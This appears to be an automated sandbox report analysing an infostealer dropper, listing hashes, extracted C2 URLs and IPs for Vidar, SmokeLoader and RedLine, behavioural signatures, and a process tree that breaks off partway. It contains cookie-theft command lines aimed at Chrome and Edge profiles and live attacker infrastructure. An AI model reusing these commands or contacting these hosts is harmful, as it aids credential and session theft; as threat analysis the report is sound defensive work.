Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    159s
  • max time network
    1810s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    30-07-2021 14:29

General

  • Target

    8 (21).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

daop

C2

45.76.235.60:49976

Extracted

Family

vidar

Version

39.8

Botnet

921

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    921

Extracted

Family

redline

Botnet

sel22

C2

salkefard.xyz:80

Extracted

Family

vidar

Version

39.8

Botnet

932

C2

https://xeronxikxxx.tumblr.com/

Attributes
  • profile_id

    932

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • CustAttr .NET packer 1 IoCs

    Detects CustAttr .NET packer in memory.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 7 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 57 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 13 IoCs
  • Modifies registry class 26 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:1000
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
      • Drops file in System32 directory
      PID:860
      • C:\Users\Admin\AppData\Roaming\eshdsse
        C:\Users\Admin\AppData\Roaming\eshdsse
        2⤵
          PID:5408
          • C:\Users\Admin\AppData\Roaming\eshdsse
            C:\Users\Admin\AppData\Roaming\eshdsse
            3⤵
              PID:4508
          • C:\Users\Admin\AppData\Roaming\ighdsse
            C:\Users\Admin\AppData\Roaming\ighdsse
            2⤵
              PID:5168
            • C:\Users\Admin\AppData\Roaming\jhhdsse
              C:\Users\Admin\AppData\Roaming\jhhdsse
              2⤵
                PID:4820
              • C:\Users\Admin\AppData\Roaming\eshdsse
                C:\Users\Admin\AppData\Roaming\eshdsse
                2⤵
                  PID:2080
                  • C:\Users\Admin\AppData\Roaming\eshdsse
                    C:\Users\Admin\AppData\Roaming\eshdsse
                    3⤵
                      PID:3444
                  • C:\Users\Admin\AppData\Roaming\ighdsse
                    C:\Users\Admin\AppData\Roaming\ighdsse
                    2⤵
                      PID:1060
                    • C:\Users\Admin\AppData\Roaming\jhhdsse
                      C:\Users\Admin\AppData\Roaming\jhhdsse
                      2⤵
                        PID:2188
                      • C:\Users\Admin\AppData\Roaming\ighdsse
                        C:\Users\Admin\AppData\Roaming\ighdsse
                        2⤵
                          PID:368
                        • C:\Users\Admin\AppData\Roaming\eshdsse
                          C:\Users\Admin\AppData\Roaming\eshdsse
                          2⤵
                            PID:6036
                            • C:\Users\Admin\AppData\Roaming\eshdsse
                              C:\Users\Admin\AppData\Roaming\eshdsse
                              3⤵
                                PID:5036
                            • C:\Users\Admin\AppData\Roaming\jhhdsse
                              C:\Users\Admin\AppData\Roaming\jhhdsse
                              2⤵
                                PID:5812
                            • c:\windows\system32\svchost.exe
                              c:\windows\system32\svchost.exe -k netsvcs -s Browser
                              1⤵
                                PID:2852
                              • c:\windows\system32\svchost.exe
                                c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                1⤵
                                  PID:2628
                                • c:\windows\system32\svchost.exe
                                  c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
                                  1⤵
                                    PID:2620
                                  • c:\windows\system32\svchost.exe
                                    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                    1⤵
                                      PID:2424
                                    • c:\windows\system32\svchost.exe
                                      c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                      1⤵
                                        PID:2416
                                      • c:\windows\system32\svchost.exe
                                        c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                        1⤵
                                          PID:1844
                                        • c:\windows\system32\svchost.exe
                                          c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                          1⤵
                                            PID:1412
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                            1⤵
                                              PID:1252
                                            • c:\windows\system32\svchost.exe
                                              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                              1⤵
                                                PID:1232
                                              • c:\windows\system32\svchost.exe
                                                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                1⤵
                                                  PID:1080
                                                • C:\Users\Admin\AppData\Local\Temp\8 (21).exe
                                                  "C:\Users\Admin\AppData\Local\Temp\8 (21).exe"
                                                  1⤵
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:3492
                                                  • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:3008
                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\setup_install.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\setup_install.exe"
                                                      3⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:3224
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                        4⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:1324
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_2.exe
                                                          sonia_2.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Checks SCSI registry key(s)
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:2324
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                        4⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2020
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_1.exe
                                                          sonia_1.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:3904
                                                          • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_1.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_1.exe" -a
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:2608
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c sonia_3.exe
                                                        4⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2100
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_3.exe
                                                          sonia_3.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Modifies system certificate store
                                                          PID:948
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 948 -s 1028
                                                            6⤵
                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                            • Program crash
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4440
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c sonia_4.exe
                                                        4⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:3124
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_4.exe
                                                          sonia_4.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:1420
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c sonia_5.exe
                                                        4⤵
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:2116
                                                        • C:\Users\Admin\AppData\Local\Temp\7zS0CB17944\sonia_5.exe
                                                          sonia_5.exe
                                                          5⤵
                                                          • Executes dropped EXE
                                                          • Checks computer location settings
                                                          PID:1096
                                                          • C:\Users\Admin\Documents\aoLIA5eN4sMITHrtMZSrPGta.exe
                                                            "C:\Users\Admin\Documents\aoLIA5eN4sMITHrtMZSrPGta.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4712
                                                            • C:\Users\Admin\AppData\Roaming\3337729.exe
                                                              "C:\Users\Admin\AppData\Roaming\3337729.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:4792
                                                            • C:\Users\Admin\AppData\Roaming\1497320.exe
                                                              "C:\Users\Admin\AppData\Roaming\1497320.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              PID:764
                                                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                8⤵
                                                                • Executes dropped EXE
                                                                PID:5252
                                                            • C:\Users\Admin\AppData\Roaming\8328136.exe
                                                              "C:\Users\Admin\AppData\Roaming\8328136.exe"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:4560
                                                          • C:\Users\Admin\Documents\lvpdWRduBMbtNdzwzaaN91YK.exe
                                                            "C:\Users\Admin\Documents\lvpdWRduBMbtNdzwzaaN91YK.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:4728
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 660
                                                              7⤵
                                                              • Program crash
                                                              PID:2780
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 676
                                                              7⤵
                                                              • Program crash
                                                              PID:5060
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 684
                                                              7⤵
                                                              • Program crash
                                                              PID:4944
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 700
                                                              7⤵
                                                              • Program crash
                                                              PID:4524
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 892
                                                              7⤵
                                                              • Program crash
                                                              PID:1704
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4728 -s 1080
                                                              7⤵
                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                              • Program crash
                                                              PID:5276
                                                          • C:\Users\Admin\Documents\ed26Y5Y7fyplDaUJ7s2b6UBa.exe
                                                            "C:\Users\Admin\Documents\ed26Y5Y7fyplDaUJ7s2b6UBa.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            PID:4724
                                                            • C:\Users\Admin\Documents\ed26Y5Y7fyplDaUJ7s2b6UBa.exe
                                                              C:\Users\Admin\Documents\ed26Y5Y7fyplDaUJ7s2b6UBa.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:5040
                                                          • C:\Users\Admin\Documents\mqqEYyV9wuSTLmoarZVjO43W.exe
                                                            "C:\Users\Admin\Documents\mqqEYyV9wuSTLmoarZVjO43W.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:4760
                                                          • C:\Users\Admin\Documents\pQF93B873FdNACUGKYNKkLWC.exe
                                                            "C:\Users\Admin\Documents\pQF93B873FdNACUGKYNKkLWC.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            • Suspicious use of SetThreadContext
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4820
                                                            • C:\Users\Admin\Documents\pQF93B873FdNACUGKYNKkLWC.exe
                                                              C:\Users\Admin\Documents\pQF93B873FdNACUGKYNKkLWC.exe
                                                              7⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              PID:4952
                                                          • C:\Users\Admin\Documents\lFSsctQ1iJ8UJaWgxd3Z8Qxz.exe
                                                            "C:\Users\Admin\Documents\lFSsctQ1iJ8UJaWgxd3Z8Qxz.exe"
                                                            6⤵
                                                            • Executes dropped EXE
                                                            PID:4808
                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:6044
                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:6088
                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                              7⤵
                                                              • Executes dropped EXE
                                                              PID:6076
                                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                              7⤵
                                                                PID:6120
                                                            • C:\Users\Admin\Documents\9o2XY3pJhpnUHNnekzSPkP4B.exe
                                                              "C:\Users\Admin\Documents\9o2XY3pJhpnUHNnekzSPkP4B.exe"
                                                              6⤵
                                                              • Executes dropped EXE
                                                              • Drops file in Program Files directory
                                                              PID:4912
                                                              • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Checks whether UAC is enabled
                                                                • Drops file in Program Files directory
                                                                PID:4216
                                                              • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                7⤵
                                                                • Executes dropped EXE
                                                                • Drops startup file
                                                                PID:4104
                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:5832
                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                  8⤵
                                                                    PID:5880
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:5236
                                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:5208
                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                    8⤵
                                                                      PID:5360
                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                      8⤵
                                                                        PID:5536
                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                      "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      PID:4664
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        PID:4816
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        8⤵
                                                                        • Executes dropped EXE
                                                                        PID:5708
                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                        8⤵
                                                                          PID:4368
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          8⤵
                                                                            PID:3032
                                                                      • C:\Users\Admin\Documents\4DwXfg834RCGUmFTGZ9Opk5m.exe
                                                                        "C:\Users\Admin\Documents\4DwXfg834RCGUmFTGZ9Opk5m.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of SetThreadContext
                                                                        PID:4896
                                                                        • C:\Users\Admin\Documents\4DwXfg834RCGUmFTGZ9Opk5m.exe
                                                                          "C:\Users\Admin\Documents\4DwXfg834RCGUmFTGZ9Opk5m.exe"
                                                                          7⤵
                                                                          • Executes dropped EXE
                                                                          PID:5880
                                                                      • C:\Users\Admin\Documents\UCyYrKrbIs45tBtuhoPYwzFM.exe
                                                                        "C:\Users\Admin\Documents\UCyYrKrbIs45tBtuhoPYwzFM.exe"
                                                                        6⤵
                                                                        • Executes dropped EXE
                                                                        PID:4964
                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                          7⤵
                                                                            PID:4904
                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                            7⤵
                                                                              PID:5208
                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                              7⤵
                                                                                PID:5976
                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                7⤵
                                                                                  PID:3156
                                                                              • C:\Users\Admin\Documents\LrzUuiJYTQMNWKyWbKxoraBi.exe
                                                                                "C:\Users\Admin\Documents\LrzUuiJYTQMNWKyWbKxoraBi.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:4152
                                                                                • C:\Users\Admin\Documents\LrzUuiJYTQMNWKyWbKxoraBi.exe
                                                                                  "C:\Users\Admin\Documents\LrzUuiJYTQMNWKyWbKxoraBi.exe" -a
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2560
                                                                              • C:\Users\Admin\Documents\JzmermfuG_g6ygMdp7puyzdM.exe
                                                                                "C:\Users\Admin\Documents\JzmermfuG_g6ygMdp7puyzdM.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Checks BIOS information in registry
                                                                                • Checks whether UAC is enabled
                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                PID:4340
                                                                              • C:\Users\Admin\Documents\Z3uXLZ9uG94_Jh_nVHqwMtWF.exe
                                                                                "C:\Users\Admin\Documents\Z3uXLZ9uG94_Jh_nVHqwMtWF.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:4392
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 660
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:1160
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 676
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:4460
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 636
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:2232
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 640
                                                                                  7⤵
                                                                                  • Program crash
                                                                                  PID:1328
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 1072
                                                                                  7⤵
                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                  • Program crash
                                                                                  PID:5436
                                                                              • C:\Users\Admin\Documents\IULssGLau0ubDl6lqtd7LFiI.exe
                                                                                "C:\Users\Admin\Documents\IULssGLau0ubDl6lqtd7LFiI.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:4252
                                                                                • C:\Users\Admin\Documents\IULssGLau0ubDl6lqtd7LFiI.exe
                                                                                  "C:\Users\Admin\Documents\IULssGLau0ubDl6lqtd7LFiI.exe"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Suspicious use of SetThreadContext
                                                                                  PID:2324
                                                                              • C:\Users\Admin\Documents\1_2V4K8JsKOdtXmR22mhOlm3.exe
                                                                                "C:\Users\Admin\Documents\1_2V4K8JsKOdtXmR22mhOlm3.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:4312
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                  7⤵
                                                                                    PID:1328
                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                      taskkill /f /im chrome.exe
                                                                                      8⤵
                                                                                      • Kills process with taskkill
                                                                                      PID:5408
                                                                                • C:\Users\Admin\Documents\6kOW_LZdnd9w2n3wFGzccS70.exe
                                                                                  "C:\Users\Admin\Documents\6kOW_LZdnd9w2n3wFGzccS70.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4484
                                                                                  • C:\Users\Admin\Documents\6kOW_LZdnd9w2n3wFGzccS70.exe
                                                                                    "C:\Users\Admin\Documents\6kOW_LZdnd9w2n3wFGzccS70.exe"
                                                                                    7⤵
                                                                                      PID:4712
                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                        8⤵
                                                                                          PID:5524
                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe"
                                                                                            9⤵
                                                                                              PID:2180
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                                            8⤵
                                                                                              PID:6056
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
